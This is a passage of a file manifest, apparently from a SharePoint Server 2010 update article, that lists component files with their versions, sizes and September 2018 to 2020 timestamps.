07-Sep-2018| 04:17 \npshdnft.asx| enablefeatures.aspx| | 6,358| 07-Sep-2018| 04:17 \npshdnst.asx| enablingfeatures.aspx| | 6,597| 07-Sep-2018| 04:17 \npsite_mysite.master| mysite.master| | 22,685| 07-Sep-2018| 04:17 \npubacmnu.asx| publishingactionmenu.ascx| | 4,805| 07-Sep-2018| 11:41 \npubconsl.asx| publishingconsole.ascx| | 11,476| 07-Sep-2018| 11:41 \npublctt.xml| publishedlinkscontenttypes.xml| | 947| 11-Sep-2018| 02:06 \npublishedlinksservicedisco.aspx| publishedlinksservicedisco.aspx| | 1,036| 07-Sep-2018| 03:57 \npublishedlinksservicewsdl.aspx| publishedlinksservicewsdl.aspx| | 4,407| 07-Sep-2018| 03:57 \npubrctt.xml| publishingcontenttypes.xml| | 11,886| 11-Sep-2018| 02:06 \npubrctt2.xml| publishingcontenttypes2.xml| | 303| 11-Sep-2018| 02:06 \npubrxslcbqmain_xsl| contentquerymain.xsl| | 18,538| 11-Sep-2018| 02:06 \npubrxslheaderstyle_xsl| header.xsl| | 2,646| 11-Sep-2018| 02:06 \npubsrvc.asmx| publishingservice.asmx| | 202| 07-Sep-2018| 11:41 \npubsrvcd.asx| publishingservicedisco.aspx| | 1,250| 07-Sep-2018| 11:41 \npubsrvcw.asx| publishingservicewsdl.aspx| | 20,031| 07-Sep-2018| 11:41 \nquery.dll| microsoft.sharepoint.search.extended.query.dll| 14.0.337.7| 260,840| 11-Sep-2018| 06:39 \nquery9x.dll_0001| query.dll| 14.0.7005.1000| 372,312| 11-Sep-2018| 06:39 \nquicklinks.aspx| quicklinks.aspx| | 8,046| 07-Sep-2018| 04:17 \nquicklinksdialog.aspx| quicklinksdialog.aspx| | 2,032| 07-Sep-2018| 04:17 \nquicklinksdialog2.aspx| quicklinksdialog2.aspx| | 1,787| 07-Sep-2018| 04:17 \nquicklinksdialogform.aspx| quicklinksdialogform.aspx| | 10,430| 07-Sep-2018| 04:17 \nrankpromotionmanagement1.aspx| rankpromotionmanagement.aspx| | 5,542| 07-Sep-2018| 04:12 \nrate.png| ratings.png| | 601| 11-Sep-2018| 06:42 \nrateemty.png| ratingsempty.png| | 1,184| 11-Sep-2018| 06:42 \nratenew.png| ratingsnew.png| | 1,211| 11-Sep-2018| 06:42 \nratertl.png| ratingsrtl.png| | 612| 11-Sep-2018| 06:42 \nratings.js| ratings.js| | 18,397| 11-Sep-2018| 06:47 \nratingssettings.aspx| ratingssettings.aspx| | 6,162| 07-Sep-2018| 04:17 \nrcconsole.aspx_rcconfig| rcconsole.aspx| | 8,524| 07-Sep-2018| 11:44 \nrecordresources.xml_recres| recordresources.xml| | 6,670| 11-Sep-2018| 02:11 \nrecordsribbon.ascx| recordsribbon.ascx| | 366| 11-Sep-2018| 02:11 \nredircpg.asx| redirectpage.aspx| | 209| 07-Sep-2018| 11:41 \nredirpl.xml| redirectpagelayout.aspx| | 4,305| 07-Sep-2018| 11:41 \nregset.asx| regionalsettingspushdown.ascx| | 2,408| 07-Sep-2018| 11:41 \nrelatedtags_dwp| relatedtags.dwp| | 571| 07-Sep-2018| 04:17 \nreleasehold.aspx| releasehold.aspx| | 3,701| 11-Sep-2018| 02:11 \nrellinksscopesettings.aspx| rellinksscopesettings.aspx| | 4,734| 07-Sep-2018| 04:17 \nremoveworkflowdefinitionsandinstances.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| | | 5,177| 07-Sep-2018| 03:39 \nrepair.aspx_ldoclib| repair.aspx| | 3,911| 07-Sep-2018| 04:19 \nrepair.aspx_pubfeap| repair.aspx| | 3,911| 07-Sep-2018| 04:19 \nrepair.aspx_pubresfeat| repair.aspx| | 3,911| 07-Sep-2018| 04:19 \nreportcenterasample.aspx| sample.aspx| | 286| 07-Sep-2018| 04:17 \nreportcenterdefault.aspx| default.aspx| | 286| 07-Sep-2018| 04:17 \nreportcenterdoclibrepair_aspx| repair.aspx| | 3,911| 07-Sep-2018| 04:19 \nreportcenterdoclibupload_aspx| upload.aspx| | 15,839| 07-Sep-2018| 04:19 \nreportcenterlayout.aspx| reportcenterlayout.aspx| | 6,117| 07-Sep-2018| 04:17 \nreportcenterxmlonet_xml| onet.xml| | 26,288| 07-Sep-2018| 04:17 \nreporting.aspx| reporting.aspx| | 8,943| 11-Sep-2018| 02:11 \nresfast_aspx| results.aspx| | 286| 07-Sep-2018| 04:12 \nresrem.apx| searchresultremoval.aspx| | 11,975| 07-Sep-2018| 04:12 \nresults_aspx| results.aspx| | 286| 07-Sep-2018| 04:12 \nretentionsettings.ascx| retentionsettings.ascx| | 10,858| 11-Sep-2018| 02:11 \nretentionstagesettings.aspx| retentionstagesettings.aspx| | 25,676| 11-Sep-2018| 02:11 \nrightrule.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| rightrule.sql| | 1,332| 07-Sep-2018| 03:39 \nrlcurview.aspx| current.aspx| | 3,462| 07-Sep-2018| 04:17 \nrlupload.aspx| upload.aspx| | 15,839| 07-Sep-2018| 04:19 \nroutermessage.aspx| routermessage.aspx| | 6,271| 11-Sep-2018| 02:11 \nrpthist.aspx| rpthist.aspx| | 3,133| 07-Sep-2018| 04:17 \nrptlibtemplate.asx| rptlibtemplate.ascx| | 2,816| 07-Sep-2018| 04:17 \nrteercs_asx| rte2erowcolsize.aspx| | 11,542| 07-Sep-2018| 11:41 \nrteetbl_asx| rte2etable.aspx| | 41,240| 07-Sep-2018| 11:41 \nrtepued_asx| rte2pueditor.aspx| | 20,692| 07-Sep-2018| 11:41 \nrtxtpick.asx| reusabletextpicker.aspx| | 13,840| 07-Sep-2018| 11:41 \nrulerctrl.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| rulerctrl.dll| 4.0.2450.49| 47,712| 11-Sep-2018| 05:22 \nscfonet_xml| onet.xml| | 49,191| 07-Sep-2018| 04:12 \nscftabslistschema_xml| schema.xml| | 75,039| 07-Sep-2018| 04:17 \nschditem.asx| manageitemscheduling.aspx| | 8,551| 07-Sep-2018| 11:41 \nschemacollections.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| schemacollections.sql| | 11,710| 07-Sep-2018| 03:39 \nschreset.apx| searchreset.aspx| | 12,711| 07-Sep-2018| 04:12 \nscltabslistdispform_aspx| dispform.aspx| | 18,342| 11-Sep-2018| 06:47 \nscltabslisteditform_aspx| editform.aspx| | 18,319| 07-Sep-2018| 04:17 \nscltabslistnewform_aspx| newform.aspx| | 18,531| 07-Sep-2018| 04:17 \nscltabslistschema_xml| schema.xml| | 75,039| 07-Sep-2018| 04:17 \nscope.apx| scope.aspx| | 11,760| 07-Sep-2018| 04:12 \nscope1.apx| scope.aspx| | 17,037| 07-Sep-2018| 04:12 \nscpdspgp.apx| scopedisplaygroup.aspx| | 11,044| 07-Sep-2018| 04:12 \nscriptforwebtaggingui.js| scriptforwebtaggingui.js| | 69,584| 11-Sep-2018| 06:14 \nscset.asx| sitecachesettings.aspx| | 10,817| 07-Sep-2018| 11:41 \nscsummpg.aspx| scsummpg.aspx| | 3,462| 07-Sep-2018| 04:17 \nsctabslistdispform_aspx| dispform.aspx| | 18,342| 11-Sep-2018| 06:47 \nsctabslisteditform_aspx| editform.aspx| | 18,319| 07-Sep-2018| 04:17 \nsctabslistnewform_aspx| newform.aspx| | 18,531| 07-Sep-2018| 04:17 \nsctabslistschema_xml| schema.xml| | 75,039| 07-Sep-2018| 04:17 \nscwedadm.apx| searchconfigwizardeditadmincomponent.aspx| | 8,003| 07-Sep-2018| 04:12 \nscweddbs.apx| searchconfigwizardeditdatabase.aspx| | 6,891| 07-Sep-2018| 04:12 \nscwedisv.apx| searchconfigwizardeditindexserver.aspx| | 12,324| 07-Sep-2018| 04:12 \nscwedqsv.apx| searchconfigwizardeditqueryserver.aspx| | 11,967| 07-Sep-2018| 04:12 \nscwfinsh.apx| searchconfigwizardfinish.aspx| | 4,115| 07-Sep-2018| 04:12 \nscwtpcfg.apx| searchconfigwizardtopologyconfig.aspx| | 7,291| 07-Sep-2018| 04:12 \nscxmlonet_xml| onet.xml| | 48,248| 07-Sep-2018| 04:17 \nsdefault_aspx| default.aspx| | 16,945| 07-Sep-2018| 04:12 \nsearch.admin.fdprov.xml| farmdashboardprovision.xml| | 2,113| 07-Sep-2018| 04:12 \nsearch.admin.saprov.xml| searchappdashboardprovision.xml| | 4,015| 07-Sep-2018| 04:12 \nsearch.js| search.js| | 36,563| 11-Sep-2018| 06:39 \nsearchdisco.aspx| searchdisco.aspx| | 1,021| 07-Sep-2018| 04:17 \nsearchextensionswebpartdescription| featuredcontent.dwp|visualbestbet.dwp| | 654| 07-Sep-2018| 04:12 \nsearchmain.aspx| searchmain.aspx| | 18,442| 07-Sep-2018| 04:12 \nsearchom.dll| microsoft.office.server.search.dll| 14.0.7243.5000| 13,308,320| 18-Dec-2019| 03:18 \nsearchom.dll_0001| microsoft.office.server.search.dll| 14.0.7243.5000| 13,308,320| 18-Dec-2019| 03:18 \nsearchres.aspx| searchresults.aspx| | 27,443| 07-Sep-2018| 04:12 \nsearchscopes.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| searchscopes.sql| | 58,967| 07-Sep-2018| 03:39 \nsearchwsdl.aspx| searchwsdl.aspx| | 15,320| 07-Sep-2018| 04:17 \nsecurestoresetcredentials.aspx| securestoresetcredentials.aspx| | 8,739| 07-Sep-2018| 03:31 \nsecurestoresetcredentialserrorpage.aspx| securestoresetcredentialserrorpage.aspx| | 4,979| 07-Sep-2018| 03:31 \nsecurestoresetcredentialssslwarning.aspx| securestoresetcredentialssslwarning.aspx| | 5,061| 07-Sep-2018| 03:31 \nselcrpr.apx| selectcrawledproperty.aspx| | 8,876| 07-Sep-2018| 04:12 \nselectpicture.aspx| selectpicture.aspx| | 2,130| 07-Sep-2018| 04:17 \nselectpicture2.aspx| selectpicture2.aspx| | 3,374| 07-Sep-2018| 04:17 \nselectuser.aspx| selectuser.aspx| | 2,579| 07-Sep-2018| 04:17 \nselmpr.apx| selectmanagedproperty.aspx| | 5,264| 07-Sep-2018| 04:12 \nsethost.asx| sethosturldialog.aspx| | 7,591| 07-Sep-2018| 03:31 \nsetimport.aspx| setimport.aspx| | 3,133| 07-Sep-2018| 04:17 \nsets_storedprocedures.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| sets_storedprocedures.sql| | 2,330| 07-Sep-2018| 03:39 \nsharepointpub.dll| microsoft.sharepoint.publishing.dll| 14.0.7252.5000| 3,219,112| 16-Jun-2020| 07:57 \nsharepointpub_gac.dll| microsoft.sharepoint.publishing.dll| 14.0.7252.5000| 3,219,112| 16-Jun-2020| 07:57 \nshowfulltextindexmapping1.aspx| showfulltextindexmapping.aspx| | 5,635| 07-Sep-2018| 04:12 \nsikpidis.asx| simplekpidisplayformcontrol.ascx| | 2,651| 07-Sep-2018| 04:17 \nsikpied.asx| simplekpieditformcontrol.ascx| | 9,039| 07-Sep-2018| 04:17 \nsikpinew.asx| simplekpinewformcontrol.ascx| | 9,040| 07-Sep-2018| 04:17 \nsitedirsettings.aspx| sitedirectorysettings.aspx| | 9,658| 11-Sep-2018| 06:47 \nsitedirstng.asx| sitedirectorysettings.aspx| | 8,952| 11-Sep-2018| 06:47 \nsitemap.xml| admin.sitemap.osrv.xml| | 1,356| 11-Sep-2018| 06:14 \nsitesv3catpage.aspx| category.aspx| | 284| 07-Sep-2018| 04:17 \nsitesv3catrespage.aspx| categoryresults.aspx| | 284| 07-Sep-2018| 04:17 \nsitesv3default.aspx| default.aspx| | 1,940| 07-Sep-2018| 04:17 \nsitesv3sitemap.aspx| sitemap.aspx| | 284| 07-Sep-2018| 04:17 \nsitesv3siteslistdispform_aspx| dispform.aspx| | 18,342| 11-Sep-2018| 06:47 \nsitesv3siteslisteditform_aspx| editform.aspx| | 18,319| 07-Sep-2018| 04:17 \nsitesv3siteslistnewform_aspx| newform.aspx| | 18,531| 07-Sep-2018| 04:17 \nsitesv3siteslistschema_xml| schema.xml| | 72,737| 11-Sep-2018| 06:47 \nsitesv3siteslistsummary_aspx| summary.aspx| | 6,010| 07-Sep-2018| 04:17 \nsitesv3tabslistdispform_aspx| dispform.aspx| | 18,342| 11-Sep-2018| 06:47 \nsitesv3tabslisteditform_aspx| editform.aspx| | 18,319| 07-Sep-2018| 04:17 \nsitesv3tabslistnewform_aspx| newform.aspx| | 18,531| 07-Sep-2018| 04:17 \nsitesv3tabslistschema_xml| schema.xml| | 75,039| 07-Sep-2018| 04:17 \nsitesv3tabviewpage.aspx| tabviewpage.aspx| | 286| 07-Sep-2018| 04:17 \nsitesv3tabviewpagelyt.aspx| tabviewpagelayout.aspx| | 4,912| 07-Sep-2018| 04:17 \nsitesv3topsites.aspx| topsites.aspx| | 284| 07-Sep-2018| 04:17 \nsitesv3xmlonet_xml| onet.xml| | 33,914| 07-Sep-2018| 04:17 \nskuupgrade.asx| skuupgrade.aspx| | 9,519| 07-Sep-2018| 04:17 \nsm.asx| sitemanager.aspx| | 32,267| 07-Sep-2018| 11:41 \nsmcmt.asx| smtcommentsdialog.aspx| | 4,061| 07-Sep-2018| 11:41 \nsnavset.asx| sitenavigationsettings.aspx| | 8,488| 07-Sep-2018| 11:41 \nsocdata.js| socialdata.js| | 11,838| 11-Sep-2018| 06:47 \nsocdata_ascx| socialdata.ascx| | 1,294| 07-Sep-2018| 04:17 \nsocialdatabookmarklet.aspx| socialdatabookmarklet.aspx| | 1,809| 07-Sep-2018| 04:17 \nsocialdataframe.aspx| socialdataframe.aspx| | 5,254| 07-Sep-2018| 04:17 \nsocialdataservicedisco.aspx| socialdataservicedisco.aspx| | 1,030| 07-Sep-2018| 03:57 \nsocialdataservicewsdl.aspx| socialdataservicewsdl.aspx| | 87,141| 07-Sep-2018| 03:57 \nsocialsrp.sql| socialsrp.sql| | 156,059| 07-Sep-2018| 04:17 \nsocialup.sql| socialup.sql| | 134,686| 07-Sep-2018| 04:17 \nsortlnks.asx| cmsslwpsortlinks.aspx| | 4,495| 07-Sep-2018| 11:41 \nsourcecode.galsync.dll.amd64.e58be079_1383_426a_a42d_a0ada425309f| galsync.dll| 4.0.2450.49| 64,096| 11-Sep-2018| 05:22 \nsourcecode.logging.dll.amd64.e58be079_1383_426a_a42d_a0ada425309f| logging.dll| 4.0.2450.49| 18,528| 11-Sep-2018| 05:22 \nsourcecode.logging.xml.amd64.e58be079_1383_426a_a42d_a0ada425309f| logging.xml| | 448| 07-Sep-2018| 03:39 \nsp.ui.pub.ribbon.debug.js| sp.ui.pub.ribbon.debug.js| | 80,690| 12-Dec-2018| 09:29 \nsp.ui.pub.ribbon.js| sp.ui.pub.ribbon.js| | 58,748| 12-Dec-2018| 09:29 \nsp.ui.rte.publishing.debug.js| sp.ui.rte.publishing.debug.js| | 63,694| 11-Sep-2018| 02:06 \nsp.ui.rte.publishing.js| sp.ui.rte.publishing.js| | 44,063| 11-Sep-2018| 02:06 \nsp.ui.spellcheck.debug.js| sp.ui.spellcheck.debug.js| | 58,536| 11-Sep-2018| 02:06 \nsp.ui.spellcheck.js| sp.ui.spellcheck.js| | 37,528| 11-Sep-2018| 02:06 \nspdefformt_asc| sharepoint_publishing_defaultformtemplates.ascx| | 8,173| 07-Sep-2018| 11:41 \nspdisco.aspx| spsdisco.aspx| | 14,965| 07-Sep-2018| 04:17 \nspelchek.asmx| spellcheck.asmx| | 196| 07-Sep-2018| 11:41 \nspelchek_asx| spellchecker.aspx| | 12,764| 07-Sep-2018| 11:41 \nspellcheckdisco.aspx| spellcheckdisco.aspx| | 1,301| 07-Sep-2018| 04:17 \nspellcheckmanagement1.aspx| spellcheckmanagement.aspx| | 7,910| 07-Sep-2018| 04:12 \nspellcheckwsdl.aspx| spellcheckwsdl.aspx| | 6,860| 07-Sep-2018| 04:17 \nspkpidis.asx| sharepointkpidisplayformcontrol.ascx| | 2,823| 07-Sep-2018| 04:17 \nspkpied.asx| sharepointkpieditformcontrol.ascx| | 12,229| 07-Sep-2018| 04:17 \nspkpinew.asx| sharepointkpinewformcontrol.ascx| | 11,974| 07-Sep-2018| 04:17 \nsplistfil_dwp| splistfilter.dwp| | 622| 07-Sep-2018| 04:17 \nspnewdashboard.aspx| spnewdashboard.aspx| | 12,089| 07-Sep-2018| 04:17 \nspscrawldisco.aspx| spscrawldisco.aspx| | 1,017| 07-Sep-2018| 04:17 \nspscrawlwsdl.aspx| spscrawlwsdl.aspx| | 10,791| 07-Sep-2018| 04:17 \nspscrntl.rsx| spscore.resx| | 85,962| 11-Sep-2018| 06:47 \nspsintl.dll| microsoft.sharepoint.portal.intl.dll| 14.0.7003.1000| 1,198,752| 11-Sep-2018| 06:47 \nspsredirect.aspx| spsredirect.aspx| | 246| 07-Sep-2018| 04:17 \nspsredr.asx| spsredr.aspx| | 298| 07-Sep-2018| 04:17 \nspstd1.asx| spstd1.aspx| | 3,907| 07-Sep-2018| 03:31 \nspstd2.asx| spstd2.aspx| | 4,938| 07-Sep-2018| 03:31 \nspstd3.asx| spstd3.aspx| | 4,455| 07-Sep-2018| 03:31 \nspstd4.asx| spstd4.aspx| | 4,457| 07-Sep-2018| 03:31 \nspstd5.asx| spstd5.aspx| | 5,785| 07-Sep-2018| 03:31 \nspstd6.asx| spstd6.aspx| | 5,790| 07-Sep-2018| 03:31 \nspstd7.asx| spstd7.aspx| | 5,854| 07-Sep-2018| 03:31 \nspstd8.asx| spstd8.aspx| | 5,806| 07-Sep-2018| 03:31 \nspstdh.asx| spstdhorizontal.aspx| | 3,932| 07-Sep-2018| 03:31 \nsqlerrormessages.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| sqlerrormessages.sql| | 30,252| 07-Sep-2018| 03:39 \nsqlpersistenceproviderlogic.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| sqlpersistenceproviderlogic.sql| | 6,744| 07-Sep-2018| 03:39 \nsqlpersistenceproviderschema.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| sqlpersistenceproviderschema.sql| | 1,097| 07-Sep-2018| 03:39 \nsqlpersistenceservice_logic.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| sqlpersistenceservice_logic.sql| | 11,904| 07-Sep-2018| 03:39 \nsqlpersistenceservice_schema.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| sqlpersistenceservice_schema.sql| | 2,120| 07-Sep-2018| 03:39 \nsqlworkitemschedulerlogic.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| sqlworkitemschedulerlogic.sql| | 5,643| 07-Sep-2018| 03:39 \nsqlworkitemschedulerschema.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| sqlworkitemschedulerschema.sql| | 463| 07-Sep-2018| 03:39 \nsqmapi.dll.62b8ceef_1020_4520_8b7c_a5a4c498eb66| sqmapi.dll| 6.0.6000.16386 (vista_rtm.061101-2205)| 177,696| 07-Sep-2018| 03:39 \nsrcadmin.apx| searchadministration.aspx| | 16,886| 07-Sep-2018| 04:12 \nsrchaath.aspx| searchandaddtohold.aspx| | 18,775| 11-Sep-2018| 02:11 \nsrcheml.apx| searchemail.aspx| | 6,256| 07-Sep-2018| 04:12 \nsrchipp.dll| srchipp.dll| 14.0.7005.1000| 1,418,336| 11-Sep-2018| 06:36 \nsrchout.apx| searchtimeout.aspx| | 6,625| 07-Sep-2018| 04:12 \nsrchprx.apx| searchproxy.aspx| | 7,862| 07-Sep-2018| 04:12 \nsrchssl.apx| searchssl.aspx| | 5,235| 07-Sep-2018| 04:12 \nsresults_aspx| results.aspx| | 23,270| 07-Sep-2018| 04:12 \nsrpdfaul.asx| default.aspx| | 1,495| 07-Sep-2018| 03:57 \nsspadmin.mas| sspadmin.master| | 29,079| 07-Sep-2018| 03:57 \nstoredprocedures.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| storedprocedures.sql| | 118,557| 11-Sep-2018| 05:22 \nsubvar_asx| submitvariations.aspx| | 4,202| 07-Sep-2018| 11:41 \nsucces.asx| success.aspx| | 2,951| 07-Sep-2018| 03:57 \nsvrexport.exe.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| svrexport.exe| 4.0.2450.49| 35,424| 11-Sep-2018| 05:22 \nsvrsetup.dll| svrsetup.dll| 14.0.7248.5000| 7,343,232| 14-Apr-2020| 12:19 \nsvrsetup.exe| setup.exe| 14.0.7248.5000| 1,393,264| 14-Apr-2020| 12:19 \nsynchronizationsetting.aspx| synchronizationsetting.aspx| | 5,162| 07-Sep-2018| 04:17 \nsyncnow.aspx| syncnow.aspx| | 3,368| 07-Sep-2018| 04:17 \nsyncsetuputl.dll.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| syncsetuputl.dll| 4.0.2450.49| 233,064| 11-Sep-2018| 05:22 \nsync_storedprocedures.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| sync_storedprocedures.sql| | 15,045| 07-Sep-2018| 03:39 \nsync_synchronizationrules.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| sync_synchronizationrules.sql| | 2,578| 11-Sep-2018| 05:22 \ntables.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| tables.sql| | 15,363| 07-Sep-2018| 03:39 \ntactprf.asx| ta_createprofiledialog.aspx| | 4,142| 07-Sep-2018| 03:31 \ntaggedpeoplelist_dwp| taggedpeoplelist.dwp| | 586| 07-Sep-2018| 04:17 \ntaggedurllist_dwp| taggedurllist.dwp| | 577| 07-Sep-2018| 04:17 \ntaginformation_dwp| taginformation.dwp| | 580| 07-Sep-2018| 04:17 \ntamanagesssvcapp.aspx| ta_managesssvcapplication.aspx| | 6,210| 07-Sep-2018| 03:31 \ntamanagesssvccred.aspx| ta_managesssvcapplicationcredentials.aspx| | 4,323| 07-Sep-2018| 03:31 \ntamanagetarapp.aspx| ta_managetargetapplication.aspx| | 7,238| 07-Sep-2018| 03:31 \ntargetappgeneralsettingssection.ascx| targetappgeneralsettingssection.ascx| | 10,855| 07-Sep-2018| 03:31 \ntargetapplicationssection.ascx| targetapplicationssection.ascx| | 9,647| 07-Sep-2018| 03:31 \ntasethost.asx| ta_sethosturldialog.aspx| | 7,600| 07-Sep-2018| 03:31 \ntaudience_defruleedit.aspx| audience_defruleedit.aspx| | 8,451| 07-Sep-2018| 04:17 \ntaudience_edit.aspx| audience_edit.aspx| | 5,234| 07-Sep-2018| 04:17 \ntaudience_list.aspx| audience_list.aspx| | 3,576| 07-Sep-2018| 04:17 \ntaudience_main.aspx| audience_main.aspx| | 4,328| 07-Sep-2018| 04:17 \ntaudience_memberlist.aspx| audience_memberlist.aspx| | 3,630| 07-Sep-2018| 04:17 \ntaudience_sched.aspx| audience_sched.aspx| | 3,143| 07-Sep-2018| 04:17 \ntaudience_view.aspx| audience_view.aspx| | 5,364| 07-Sep-2018| 04:17 \ntaxonomy.sql| taxonomy.sql| | 217,716| 11-Sep-2018| 06:14 \ntaxonomyclientservice.amx| taxonomyclientservice.asmx| | 213| 07-Sep-2018| 03:57 \ntaxonomyclientservicedisco.asp| taxonomyclientservicedisco.aspx| | 1,259| 07-Sep-2018| 03:57 \ntaxonomyclientservicewsdl.asp| taxonomyclientservicewsdl.aspx| | 11,144| 07-Sep-2018| 03:57 \ntaxonomyfieldeditor.acx| taxonomyfieldeditor.ascx| | 11,918| 07-Sep-2018| 03:57 \ntaxonomyinternalservice.amx| taxonomyinternalservice.asmx|taxonomyinternalservice.json| | 215| 07-Sep-2018| 03:57 \ntaxonomytreepicker.apx| taxonomytreepicker.aspx| | 4,177| 11-Sep-2018| 06:14 \ntaxpicker_ascx| taxonomypicker.ascx| | 3,943| 07-Sep-2018| 04:17 \ntaxupdateprocs.sql| taxupdateprocs.sql| | 207,054| 11-Sep-2018| 06:14 \nteditconnectionfilters.aspx| editconnectionfilters.aspx| | 9,722| 07-Sep-2018| 04:17 \nteditdsserver.aspx| editdsserver.aspx| | 17,789| 07-Sep-2018| 04:17 \nteditlink.aspx| editlink.aspx| | 20,237| 07-Sep-2018| 04:17 \nteditpolicy.aspx| editpolicy.aspx| | 3,965| 07-Sep-2018| 04:17 \nteditproperty.aspx| editproperty.aspx| | 19,689| 07-Sep-2018| 04:17 \nteditpropertynames.aspx| editpropertynames.aspx| | 2,157| 07-Sep-2018| 04:17 \nteditpropertynames2.aspx| editpropertynames2.aspx| | 3,156| 07-Sep-2018| 04:17 \nteditsection.aspx| editsection.aspx| | 5,364| 07-Sep-2018| 04:17 \ntermstoremanager.apx| termstoremanager.aspx| | 52,767| 11-Sep-2018| 06:14 \ntermstoremanager.js| termstoremanager.js| | 131,679| 11-Sep-2018| 06:14 \nthoughts.aspx| thoughts.aspx| | 10,779| 07-Sep-2018| 04:17 \ntimezones.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| timezones.sql| | 15,854| 07-Sep-2018| 03:39 \ntlistenabletargeting.aspx| listenabletargeting.aspx| | 4,171| 07-Sep-2018| 04:17 \ntmanagelinks.aspx| managelinks.aspx| | 16,984| 07-Sep-2018| 04:17 \ntmanagesocialitems.aspx| managesocialitems.aspx| | 21,293| 07-Sep-2018| 04:17 \ntmanagesubtype.aspx| managesubtypes.aspx| | 4,587| 07-Sep-2018| 04:17 \ntmanageuserprofileserviceapplication.aspx| manageuserprofileserviceapplication.aspx| | 3,204| 07-Sep-2018| 04:17 \ntmgrdsserver.aspx| mgrdsserver.aspx| | 2,193| 07-Sep-2018| 04:17 \ntmgrpolicy.aspx| manageprivacypolicy.aspx| | 16,360| 07-Sep-2018| 04:17 \ntmgrproperty.aspx| mgrproperty.aspx| | 2,292| 07-Sep-2018| 04:17 \ntocv3home.aspx| default.aspx| | 286| 07-Sep-2018| 04:17 \ntocv3xmlonet_xml| onet.xml| | 7,112| 07-Sep-2018| 04:17 \ntopicv3home.aspx| default.aspx| | 286| 07-Sep-2018| 04:17 \ntopicv3xmlonet_xml| onet.xml| | 7,221| 07-Sep-2018| 04:17 \ntorgadminedit.aspx| orgadminedit.aspx| | 2,562| 07-Sep-2018| 04:17 \ntorgnew.aspx| orgnew.aspx| | 2,585| 07-Sep-2018| 04:17 \ntpcfgfh.apx| topologyconfigfinish.aspx| | 3,877| 07-Sep-2018| 04:12 \ntpersonalsites.aspx| personalsites.aspx| | 15,536| 07-Sep-2018| 04:17 \ntplapset.apx| topologyappsettings.aspx| | 23,555| 07-Sep-2018| 04:12 \ntprofadminedit.aspx| profadminedit.aspx| | 2,566| 07-Sep-2018| 04:17 \ntprofileredirect.aspx| profileredirect.aspx| | 1,429| 07-Sep-2018| 04:17 \ntprofmngr.aspx| profmngr.aspx| | 3,390| 07-Sep-2018| 04:17 \ntprofnew.aspx| profnew.aspx| | 2,586| 07-Sep-2018| 04:17 \ntquery.dll| tquery.dll| 14.0.7005.1000| 5,646,936| 11-Sep-2018| 06:39 \ntranslt.asx| translatablesettings.aspx| | 8,819| 07-Sep-2018| 11:41 \ntreecontrol.js| treecontrol.js| | 124,407| 11-Sep-2018| 06:14 \ntruncatedeletedexpiredobjects.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| | | 19,260| 07-Sep-2018| 03:39 \ntsetimport.aspx| setimport.aspx| | 3,145| 07-Sep-2018| 04:17 \ntsynchronizationsetting.aspx| synchronizationsetting.aspx| | 5,174| 07-Sep-2018| 04:17 \ntsyncnow.aspx| syncnow.aspx| | 3,380| 07-Sep-2018| 04:17 \ntuserprofileapplicationpermissions.aspx| userprofileapplicationpermissions.aspx| | 3,919| 07-Sep-2018| 04:17 \ntxtflt_dwp| textfilter.dwp| | 721| 07-Sep-2018| 04:17 \ntxtlstvw.aspx| txtlstvw.aspx| | 1,799| 07-Sep-2018| 04:17 \nuiutils.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| uiutils.dll| 4.0.2450.49| 379,488| 11-Sep-2018| 05:22 \nunaprsrc.asx| unapprovedresources.aspx| | 15,183| 07-Sep-2018| 11:41 \nuocconfigurations.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| uocconfigurations.sql| | 612,774| 07-Sep-2018| 03:39 \nupdated.aspx| updated.aspx| | 3,462| 07-Sep-2018| 04:17 \nupdsched1.apx| updateschedule.aspx| | 5,844| 07-Sep-2018| 04:12 \nupgd1.xml| upgrade1.xml| | 547| 11-Sep-2018| 02:06 \nupgrade.dll_001| microsoft.sharepoint.portal.upgrade.dll| 14.0.7171.5000| 175,896| 11-Sep-2018| 06:47 \nupload.aspx_dcl| upload.aspx| | 15,820| 07-Sep-2018| 03:57 \nupload.aspx_ldoclib| upload.aspx| | 15,839| 07-Sep-2018| 04:19 \nupload.aspx_pubfeap| upload.aspx| | 15,839| 07-Sep-2018| 04:19 \nupload.aspx_pubresfeat| upload.aspx| | 15,839| 07-Sep-2018| 04:19 \nupload.asx_multilang| upload.aspx| | 15,896| 11-Sep-2018| 02:11 \nuploadex.aspx| uploadex.aspx| | 20,849| 11-Sep-2018| 02:11 \nurlselector.aspx| urlselector.aspx| | 6,039| 07-Sep-2018| 04:12 \nusercontextmanagement1.aspx| usercontextmanagement.aspx| | 5,981| 07-Sep-2018| 04:12 \nuserphot.asx| | | 860| 11-Sep-2018| 01:43 \nuserprofileapplicationpermissions.aspx| userprofileapplicationpermissions.aspx| | 3,924| 07-Sep-2018| 04:17 \nuserprofilechangeservicedisco.aspx| userprofilechangeservicedisco.aspx| | 1,042| 07-Sep-2018| 04:17 \nuserprofilechangeservicewsdl.aspx| userprofilechangeservicewsdl.aspx| | 20,775| 07-Sep-2018| 04:17 \nuserprofileservicedisco.aspx| userprofileservicedisco.aspx| | 1,030| 07-Sep-2018| 04:17 \nuserprofileservicewsdl.aspx| userprofileservicewsdl.aspx| | 90,920| 07-Sep-2018| 